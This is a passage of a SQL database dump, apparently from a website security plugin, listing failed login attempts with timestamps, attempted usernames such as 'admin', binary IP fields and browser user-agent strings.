Firefox/4.0.1'),(4888,6395,1629208930.950520,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4889,6396,1629209347.041514,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4890,6418,1629213189.077464,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0�����;','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0'),(4891,6469,1629221173.617764,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ν��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4892,6472,1629221378.499405,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��->�o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4893,6473,1629221607.748544,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z0h','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4894,6476,1629221788.761825,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���7�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4895,6477,1629221994.377192,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��hƬD','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4896,6478,1629222199.353514,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�ʖ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4897,6479,1629222402.167420,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4898,6480,1629222605.819720,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��U��:','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4899,6481,1629222805.364195,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4900,6482,1629223006.999513,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����f�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4901,6483,1629223207.179278,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h%��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4902,6484,1629223416.525213,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QE8/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4903,6485,1629223615.845500,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\n�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4904,6485,1629223615.898267,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\n�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4905,6486,1629223822.491061,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4906,6487,1629224023.996918,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�R�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4907,6488,1629224091.746162,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4908,6489,1629224092.812637,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4909,6490,1629224251.362504,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qod','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4910,6491,1629224353.902043,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4911,6492,1629224354.512291,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4912,6493,1629224435.532235,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��p�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4913,6494,1629224660.137666,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B�S','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4914,6494,1629224660.182641,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B�S','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4915,6495,1629224666.869434,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4916,6496,1629224667.345685,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4917,6497,1629224841.290842,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ɬL','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4918,6498,1629224967.286711,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4919,6498,1629224967.329901,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4920,6499,1629224968.021064,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4921,6499,1629224968.030386,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4922,6500,1629225049.570412,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4923,6501,1629225247.651793,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4924,6502,1629225452.552358,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���� �','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4925,6503,1629225570.408406,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4926,6503,1629225570.427747,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4927,6504,1629225571.229673,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4928,6504,1629225571.273019,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4929,6505,1629225682.152489,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4930,6506,1629225873.839202,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ՈLB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4931,6507,1629226030.824666,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�.�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4'),(4932,6508,1629226062.093453,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4933,6509,1629226269.289423,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�1�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4934,6510,1629226506.716238,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>ҹ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4935,6511,1629226517.189479,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4936,6512,1629226517.712025,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4937,6513,1629226678.783546,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����N','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4938,6514,1629226885.279048,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4939,6515,1629226918.448874,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4940,6516,1629226918.967470,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4941,6517,1629226982.868736,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4942,6521,1629227200.058514,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4943,6524,1629227465.196543,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��{��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4944,6527,1629227725.229042,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���h,I','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4945,6528,1629228041.600980,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4946,6531,1629228301.933544,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��2��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4947,6532,1629228591.241169,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���i','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4948,6535,1629228839.889695,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����q~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4949,6540,1629229182.681264,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��?�)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4950,6545,1629229451.849468,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3� ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4951,6546,1629229545.986401,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(4952,6549,1629229713.600822,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G�k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4953,6552,1629230027.898001,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4954,6553,1629230310.278661,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���h','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4955,6556,1629230630.073786,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��p�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4956,6557,1629230880.467998,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ár�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4957,6558,1629231220.536063,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��w��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4958,6561,1629231468.549178,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���c�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4959,6561,1629231470.623964,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���c�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4960,6566,1629231794.681882,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t2~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4961,6571,1629232397.739765,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Kw�d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4962,6574,1629232635.876550,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4963,6575,1629232978.280775,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QE8/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4964,6575,1629232978.333329,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QE8/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4965,6576,1629233305.923602,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_�+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4966,6579,1629233562.831513,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4967,6582,1629233858.258500,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4968,6582,1629233858.278452,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4969,6585,1629234172.538083,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4970,6588,1629234449.587951,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4971,6588,1629234449.628232,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4972,6591,1629234759.488331,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��DF�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4973,6596,1629235028.200038,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_�hT','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4974,6599,1629235346.549579,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4975,6602,1629235686.905300,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4976,6605,1629235977.183763,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4977,6605,1629235977.267688,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4978,6610,1629236352.088447,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���� �','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4979,6613,1629236663.578954,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4980,6614,1629236914.419154,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ν�:','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4981,6614,1629236914.451163,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ν�:','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4982,6619,1629237285.552860,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���z.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4983,6619,1629237285.565419,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���z.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4984,6622,1629237583.258527,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4985,6622,1629237583.304023,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4986,6625,1629237885.288183,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��O�-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4987,6628,1629238169.039967,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���c��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4988,6631,1629238534.076694,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����6p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4989,6636,1629238832.129873,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gij','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4990,6639,1629239175.269002,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���i','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4991,6644,1629239775.147029,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ŜJ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4992,6647,1629240065.646377,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4993,6650,1629240409.843090,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���e�d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4994,6651,1629240725.185559,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4995,6654,1629241072.233491,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���֖]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4996,6657,1629241366.290131,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���X�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4997,6658,1629241698.754432,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��go(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4998,6659,1629241897.604551,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4999,6660,1629241898.208201,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5000,6661,1629242029.634518,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����zB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5001,6662,1629242117.004270,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5002,6663,1629242117.533277,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5003,6664,1629242383.627803,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5004,6665,1629242384.147831,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5005,6666,1629242464.661515,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5006,6667,1629242465.244774,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5007,6668,1629242664.097354,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ғ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5008,6669,1629242771.333882,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5009,6670,1629242772.132337,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5010,6671,1629242992.845330,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g��E','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5011,6672,1629243325.212024,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��)�@K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5012,6673,1629243412.700628,1,'loginFailInvalidUsername','antikker',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5013,6674,1629243412.913163,1,'loginFailInvalidUsername','antikker',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5014,6675,1629243413.109429,1,'loginFailInvalidUsername','antikker',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5015,6676,1629243413.324048,1,'loginFailInvalidUsername','antikker',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5016,6677,1629243413.534579,1,'loginFailInvalidUsername','antikker',0,'\0\0\0\0\0\0\0\0\0\0��>�r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 